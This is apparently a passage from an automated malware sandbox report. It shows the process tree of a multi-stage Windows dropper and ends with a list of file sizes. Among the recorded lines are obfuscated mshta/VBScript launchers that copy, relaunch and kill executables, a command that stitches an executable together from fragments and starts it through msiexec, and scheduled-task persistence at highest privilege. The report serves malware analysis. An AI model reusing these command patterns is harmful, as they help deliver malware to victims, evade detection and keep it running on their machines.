C:\Users\Admin\Pictures\Adobe Films\HXPcq6WxPdAuzfqCfI2GMi0z.exe"C:\Users\Admin\Pictures\Adobe Films\HXPcq6WxPdAuzfqCfI2GMi0z.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\HXPcq6WxPdAuzfqCfI2GMi0z.exe"C:\Users\Admin\Pictures\Adobe Films\HXPcq6WxPdAuzfqCfI2GMi0z.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VGdGpH2oTL1E6OMuHfnhf5oT.exe"C:\Users\Admin\Pictures\Adobe Films\VGdGpH2oTL1E6OMuHfnhf5oT.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\VGdGpH2oTL1E6OMuHfnhf5oT.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\VGdGpH2oTL1E6OMuHfnhf5oT.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\VGdGpH2oTL1E6OMuHfnhf5oT.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\VGdGpH2oTL1E6OMuHfnhf5oT.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "VGdGpH2oTL1E6OMuHfnhf5oT.exe" -F9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D7IbGBuJ2GV5GLwvVbOXX6Vf.exe"C:\Users\Admin\Pictures\Adobe Films\D7IbGBuJ2GV5GLwvVbOXX6Vf.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\GlgGScdKbLBGoYvIFSJxwr2H.exe"C:\Users\Admin\Pictures\Adobe Films\GlgGScdKbLBGoYvIFSJxwr2H.exe"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue162f02d7b75a1d.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue162f02d7b75a1d.exeTue162f02d7b75a1d.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1693c6e21a84f1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1693c6e21a84f1.exeTue1693c6e21a84f1.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue16937a015b8e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16937a015b8e.exeTue16937a015b8e.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0BKEP.tmp\Tue16937a015b8e.tmp"C:\Users\Admin\AppData\Local\Temp\is-0BKEP.tmp\Tue16937a015b8e.tmp" /SL5="$80056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16937a015b8e.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16937a015b8e.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16937a015b8e.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6488J.tmp\Tue16937a015b8e.tmp"C:\Users\Admin\AppData\Local\Temp\is-6488J.tmp\Tue16937a015b8e.tmp" /SL5="$80080,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16937a015b8e.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue161bd708d12e5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue161bd708d12e5.exeTue161bd708d12e5.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl" ). run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue161bd708d12e5.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If """" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue161bd708d12e5.exe"" ) do taskkill -F /iM ""%~nXE"" " , 0 , True ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue161bd708d12e5.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "" == "" for %E In ( "C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue161bd708d12e5.exe" ) do taskkill -F /iM "%~nXE"7⤵
-
C:\Users\Admin\AppData\Local\Temp\fkKCS.exefkKCS.EXE -P_3FA3g8_0NB8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl" ). run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If ""-P_3FA3g8_0NB "" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"" ) do taskkill -F /iM ""%~nXE"" " , 0 , True ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "-P_3FA3g8_0NB " == "" for %E In ( "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe" ) do taskkill -F /iM "%~nXE"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: ClOSE ( cREaTEOBjEcT ( "wSCript.sheLl" ). RUN ( "Cmd.eXE /c echo N%TIme%O> VPZp.II & EChO | set /p = ""MZ"" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+ LAQIL0YY.POg + vCTGFFAM.2ST + ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS " , 0 , TRUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo N%TIme%O> VPZp.II & EChO | set /p = "MZ" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+ LAQIL0YY.POg + vCTGFFAM.2ST + ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>KL6F.Aa_"11⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y .\pUA9.FS11⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /iM "Tue161bd708d12e5.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue165ec2d1de4f1ae98.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue165ec2d1de4f1ae98.exeTue165ec2d1de4f1ae98.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue166a21bf15ecf0.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue166a21bf15ecf0.exeTue166a21bf15ecf0.exe5⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2840 -s 13526⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1604aa7d34a61a5b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1604aa7d34a61a5b.exeTue1604aa7d34a61a5b.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue169b8ca3fff9b96f8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue169b8ca3fff9b96f8.exeTue169b8ca3fff9b96f8.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 6084⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1695d07d02bff8ff.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1647cedf7bf133.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue16752f37c10e89.exe /mixone4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16752f37c10e89.exeTue16752f37c10e89.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue16752f37c10e89.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue16752f37c10e89.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue16752f37c10e89.exe" /f3⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1695d07d02bff8ff.exeTue1695d07d02bff8ff.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\c3Nc4gbiFpVnCP48ntvxu2Rf.exe"C:\Users\Admin\Pictures\Adobe Films\c3Nc4gbiFpVnCP48ntvxu2Rf.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\3Fas3rn2ZDKcSoOS7IkABuH0.exe"C:\Users\Admin\Pictures\Adobe Films\3Fas3rn2ZDKcSoOS7IkABuH0.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\shQFsQkOHTqmMdsjGrFrwqdm.exe"C:\Users\Admin\Pictures\Adobe Films\shQFsQkOHTqmMdsjGrFrwqdm.exe"2⤵
-
C:\Users\Admin\Documents\HzlAeBuPQ_8MzJSUXeFR65jL.exe"C:\Users\Admin\Documents\HzlAeBuPQ_8MzJSUXeFR65jL.exe"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mixBTYOchmkAaPFMoK9XsHa7.exe"C:\Users\Admin\Pictures\Adobe Films\mixBTYOchmkAaPFMoK9XsHa7.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "mixBTYOchmkAaPFMoK9XsHa7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixBTYOchmkAaPFMoK9XsHa7.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "mixBTYOchmkAaPFMoK9XsHa7.exe" /f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mWh1dMQ3Z6Mwaqh4IgGDyapX.exe"C:\Users\Admin\Pictures\Adobe Films\mWh1dMQ3Z6Mwaqh4IgGDyapX.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ezTJRYlWwmMisCV8ra3scTsA.exe"C:\Users\Admin\Pictures\Adobe Films\ezTJRYlWwmMisCV8ra3scTsA.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\ezTJRYlWwmMisCV8ra3scTsA.exe"C:\Users\Admin\Pictures\Adobe Films\ezTJRYlWwmMisCV8ra3scTsA.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WBIESrF4TAjrxQGOcWFlKq4s.exe"C:\Users\Admin\Pictures\Adobe Films\WBIESrF4TAjrxQGOcWFlKq4s.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1693c6e21a84f1.exeC:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1693c6e21a84f1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1607c6ec89.exeC:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1607c6ec89.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4EC006\Tue1647cedf7bf133.exeTue1647cedf7bf133.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\mWh1dMQ3Z6Mwaqh4IgGDyapX.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\F515.exeC:\Users\Admin\AppData\Local\Temp\F515.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
456KB
-
Filesize
696KB
-
Filesize
43.0MB
-
Filesize
1.3MB
-
Filesize
428KB
-
Filesize
1.3MB
-
Filesize
6.0MB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
456KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
3.1MB
-
Filesize
68KB
-
Filesize
1.4MB
-
Filesize
1.4MB
-
Filesize
1.4MB
-
Filesize
88KB
-
Filesize
80KB
-
Filesize
456KB
-
Filesize
308KB
-
Filesize
19.0MB
-
Filesize
568KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
43.2MB
-
Filesize
1.3MB
-
Filesize
164KB
-
Filesize
4KB
-
Filesize
152KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
524KB
-
Filesize
476KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
272KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
372KB
-
Filesize
1.0MB
-
Filesize
696KB
-
Filesize
868KB
-
Filesize
856KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
384KB